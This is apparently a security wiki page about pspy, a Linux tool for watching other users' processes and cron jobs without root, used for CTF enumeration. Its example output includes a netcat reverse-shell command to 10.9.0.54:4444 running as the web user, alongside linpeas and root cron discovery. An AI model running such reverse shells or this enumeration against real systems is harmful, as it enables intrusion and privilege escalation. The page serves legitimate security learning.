Pspy
Jump to navigation
Jump to search
Description
pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea.
The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.
Official page: https://github.com/DominicBreuker/pspy
Installation
- 32 bit big, static version: pspy32 download
- 64 bit big, static version: pspy64 download
- 32 bit small version: pspy32s download
- 64 bit small version: pspy64s download
The statically compiled files should work on any Linux system but are quite huge (~4MB). If size is an issue, try the smaller versions which depend on libc and are compressed with UPX (~1MB).
Example
jack@jack:/tmp$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/06/18 09:49:49 CMD: UID=0 PID=964 | /sbin/iscsid
2020/06/18 09:49:49 CMD: UID=0 PID=963 | /sbin/iscsid
2020/06/18 09:49:49 CMD: UID=0 PID=952 | /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
2020/06/18 09:49:49 CMD: UID=0 PID=923 | /usr/lib/snapd/snapd
2020/06/18 09:49:49 CMD: UID=0 PID=919 | /usr/lib/accountsservice/accounts-daemon
2020/06/18 09:49:49 CMD: UID=0 PID=913 | /usr/sbin/atd -f
2020/06/18 09:49:49 CMD: UID=108 PID=903 | /usr/sbin/rsyslogd -n
2020/06/18 09:49:49 CMD: UID=0 PID=900 | /usr/bin/lxcfs /var/lib/lxcfs/
2020/06/18 09:49:49 CMD: UID=0 PID=9 |
2020/06/18 09:49:49 CMD: UID=0 PID=897 | /lib/systemd/systemd-logind
2020/06/18 09:49:49 CMD: UID=0 PID=892 | /usr/sbin/acpid
2020/06/18 09:49:49 CMD: UID=111 PID=888 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
2020/06/18 09:49:49 CMD: UID=0 PID=886 | /usr/sbin/cron -f
2020/06/18 09:49:49 CMD: UID=0 PID=84 |
2020/06/18 09:49:49 CMD: UID=1000 PID=8321 | /bin/sh ./linpeas.sh -a
2020/06/18 09:49:49 CMD: UID=0 PID=83 |
2020/06/18 09:49:49 CMD: UID=0 PID=82 |
2020/06/18 09:49:49 CMD: UID=1000 PID=8190 | -bash
2020/06/18 09:49:49 CMD: UID=1000 PID=8189 | sshd: jack@pts/0
2020/06/18 09:49:49 CMD: UID=1000 PID=8127 | (sd-pam)
2020/06/18 09:49:49 CMD: UID=1000 PID=8126 | /lib/systemd/systemd --user
2020/06/18 09:49:49 CMD: UID=0 PID=8124 | sshd: jack [priv]
2020/06/18 09:49:49 CMD: UID=33 PID=8114 | /usr/bin/python3 -m http.server
2020/06/18 09:49:49 CMD: UID=33 PID=8102 | /bin/sh -i
2020/06/18 09:49:49 CMD: UID=33 PID=8098 | sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.54 4444 >/tmp/f
2020/06/18 09:49:49 CMD: UID=33 PID=8094 | /usr/sbin/apache2 -k start
2020/06/18 09:49:49 CMD: UID=33 PID=8093 | /usr/sbin/apache2 -k start
2020/06/18 09:49:49 CMD: UID=33 PID=8092 | /usr/sbin/apache2 -k start
2020/06/18 09:49:49 CMD: UID=33 PID=8091 | /usr/sbin/apache2 -k start
2020/06/18 09:49:49 CMD: UID=33 PID=8090 | /usr/sbin/apache2 -k start
2020/06/18 09:49:49 CMD: UID=33 PID=8089 | /usr/sbin/apache2 -k start
2020/06/18 09:49:49 CMD: UID=33 PID=8088 | /usr/sbin/apache2 -k start
2020/06/18 09:49:49 CMD: UID=0 PID=8 |
2020/06/18 09:49:49 CMD: UID=0 PID=737 | /sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
2020/06/18 09:49:49 CMD: UID=0 PID=7 |
2020/06/18 09:49:49 CMD: UID=0 PID=69 |
2020/06/18 09:49:49 CMD: UID=0 PID=64 |
2020/06/18 09:49:49 CMD: UID=0 PID=62 |
2020/06/18 09:49:49 CMD: UID=0 PID=61 |
2020/06/18 09:49:49 CMD: UID=0 PID=60 |
2020/06/18 09:49:49 CMD: UID=0 PID=59 |
2020/06/18 09:49:49 CMD: UID=0 PID=58 |
2020/06/18 09:49:49 CMD: UID=0 PID=57 |
2020/06/18 09:49:49 CMD: UID=0 PID=56 |
2020/06/18 09:49:49 CMD: UID=0 PID=55 |
2020/06/18 09:49:49 CMD: UID=0 PID=54 |
2020/06/18 09:49:49 CMD: UID=0 PID=53 |
2020/06/18 09:49:49 CMD: UID=0 PID=52 |
2020/06/18 09:49:49 CMD: UID=0 PID=51 |
2020/06/18 09:49:49 CMD: UID=0 PID=50 |
2020/06/18 09:49:49 CMD: UID=0 PID=5 |
2020/06/18 09:49:49 CMD: UID=102 PID=494 | /lib/systemd/systemd-timesyncd
2020/06/18 09:49:49 CMD: UID=0 PID=49 |
2020/06/18 09:49:49 CMD: UID=0 PID=433 | /lib/systemd/systemd-udevd
2020/06/18 09:49:49 CMD: UID=0 PID=420 |
2020/06/18 09:49:49 CMD: UID=0 PID=418 |
2020/06/18 09:49:49 CMD: UID=0 PID=417 |
2020/06/18 09:49:49 CMD: UID=0 PID=416 |
2020/06/18 09:49:49 CMD: UID=0 PID=415 |
2020/06/18 09:49:49 CMD: UID=0 PID=404 |
2020/06/18 09:49:49 CMD: UID=0 PID=4 |
2020/06/18 09:49:49 CMD: UID=0 PID=389 | /sbin/lvmetad -f
2020/06/18 09:49:49 CMD: UID=0 PID=377 |
2020/06/18 09:49:49 CMD: UID=0 PID=373 |
2020/06/18 09:49:49 CMD: UID=0 PID=359 | /lib/systemd/systemd-journald
2020/06/18 09:49:49 CMD: UID=0 PID=33 |
2020/06/18 09:49:49 CMD: UID=0 PID=320 |
2020/06/18 09:49:49 CMD: UID=0 PID=32 |
2020/06/18 09:49:49 CMD: UID=0 PID=31 |
2020/06/18 09:49:49 CMD: UID=0 PID=30 |
2020/06/18 09:49:49 CMD: UID=0 PID=3 |
2020/06/18 09:49:49 CMD: UID=0 PID=289 |
2020/06/18 09:49:49 CMD: UID=0 PID=288 |
2020/06/18 09:49:49 CMD: UID=1000 PID=27117 | ./pspy64
2020/06/18 09:49:49 CMD: UID=1000 PID=27084 |
2020/06/18 09:49:49 CMD: UID=0 PID=27 |
2020/06/18 09:49:49 CMD: UID=0 PID=262 |
2020/06/18 09:49:49 CMD: UID=0 PID=26 |
2020/06/18 09:49:49 CMD: UID=0 PID=25 |
2020/06/18 09:49:49 CMD: UID=0 PID=24 |
2020/06/18 09:49:49 CMD: UID=0 PID=23 |
2020/06/18 09:49:49 CMD: UID=0 PID=229 |
2020/06/18 09:49:49 CMD: UID=0 PID=22 |
2020/06/18 09:49:49 CMD: UID=0 PID=21 |
2020/06/18 09:49:49 CMD: UID=0 PID=20 |
2020/06/18 09:49:49 CMD: UID=0 PID=2 |
2020/06/18 09:49:49 CMD: UID=0 PID=19 |
2020/06/18 09:49:49 CMD: UID=0 PID=18 |
2020/06/18 09:49:49 CMD: UID=0 PID=17 |
2020/06/18 09:49:49 CMD: UID=0 PID=15 |
2020/06/18 09:49:49 CMD: UID=0 PID=143 |
2020/06/18 09:49:49 CMD: UID=0 PID=14 |
2020/06/18 09:49:49 CMD: UID=0 PID=13550 |
2020/06/18 09:49:49 CMD: UID=0 PID=13548 |
2020/06/18 09:49:49 CMD: UID=0 PID=13 |
2020/06/18 09:49:49 CMD: UID=0 PID=129 |
2020/06/18 09:49:49 CMD: UID=0 PID=1287 | logger -t mysqld -p daemon error
2020/06/18 09:49:49 CMD: UID=118 PID=1286 | /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --skip-log-error --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
2020/06/18 09:49:49 CMD: UID=0 PID=128 |
2020/06/18 09:49:49 CMD: UID=0 PID=127 |
2020/06/18 09:49:49 CMD: UID=0 PID=12613 |
2020/06/18 09:49:49 CMD: UID=0 PID=126 |
2020/06/18 09:49:49 CMD: UID=0 PID=125 |
2020/06/18 09:49:49 CMD: UID=0 PID=124 |
2020/06/18 09:49:49 CMD: UID=0 PID=123 |
2020/06/18 09:49:49 CMD: UID=0 PID=122 |
2020/06/18 09:49:49 CMD: UID=0 PID=121 |
2020/06/18 09:49:49 CMD: UID=0 PID=12 |
2020/06/18 09:49:49 CMD: UID=0 PID=1142 | /bin/bash /usr/bin/mysqld_safe
2020/06/18 09:49:49 CMD: UID=0 PID=1132 | /usr/sbin/apache2 -k start
2020/06/18 09:49:49 CMD: UID=0 PID=11 |
2020/06/18 09:49:49 CMD: UID=0 PID=1093 | /usr/sbin/sshd -D
2020/06/18 09:49:49 CMD: UID=0 PID=1079 | /usr/lib/policykit-1/polkitd --no-debug
2020/06/18 09:49:49 CMD: UID=0 PID=1078 | /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
2020/06/18 09:49:49 CMD: UID=0 PID=1070 | /sbin/agetty --noclear tty1 linux
2020/06/18 09:49:49 CMD: UID=0 PID=10 |
2020/06/18 09:49:49 CMD: UID=0 PID=1 | /sbin/init
2020/06/18 09:50:01 CMD: UID=0 PID=27131 | /usr/bin/python /opt/statuscheck/checker.py
2020/06/18 09:50:01 CMD: UID=0 PID=27130 | /bin/sh -c /usr/bin/python /opt/statuscheck/checker.py
2020/06/18 09:50:01 CMD: UID=0 PID=27129 | /usr/sbin/CRON -f
2020/06/18 09:50:01 CMD: UID=0 PID=27133 | sh -c /usr/bin/curl -s -I http://127.0.0.1 >> /opt/statuscheck/output.log
2020/06/18 09:50:01 CMD: UID=0 PID=27132 | sh -c /usr/bin/curl -s -I http://127.0.0.1 >> /opt/statuscheck/output.log
2020/06/18 09:52:01 CMD: UID=0 PID=27137 | /usr/bin/python /opt/statuscheck/checker.py
2020/06/18 09:52:01 CMD: UID=0 PID=27136 | /bin/sh -c /usr/bin/python /opt/statuscheck/checker.py
2020/06/18 09:52:01 CMD: UID=0 PID=27135 | /usr/sbin/CRON -f
2020/06/18 09:52:01 CMD: UID=0 PID=27139 | /usr/bin/curl -s -I http://127.0.0.1
2020/06/18 09:52:01 CMD: UID=0 PID=27138 | sh -c /usr/bin/curl -s -I http://127.0.0.1 >> /opt/statuscheck/output.log
2020/06/18 09:54:01 CMD: UID=0 PID=27143 | /usr/bin/python /opt/statuscheck/checker.py
2020/06/18 09:54:01 CMD: UID=0 PID=27142 | /bin/sh -c /usr/bin/python /opt/statuscheck/checker.py
2020/06/18 09:54:01 CMD: UID=0 PID=27141 | /usr/sbin/CRON -f
2020/06/18 09:54:01 CMD: UID=0 PID=27144 | /usr/bin/python /opt/statuscheck/checker.py
2020/06/18 09:54:01 CMD: UID=0 PID=27145 | sh -c /usr/bin/curl -s -I http://127.0.0.1 >> /opt/statuscheck/output.log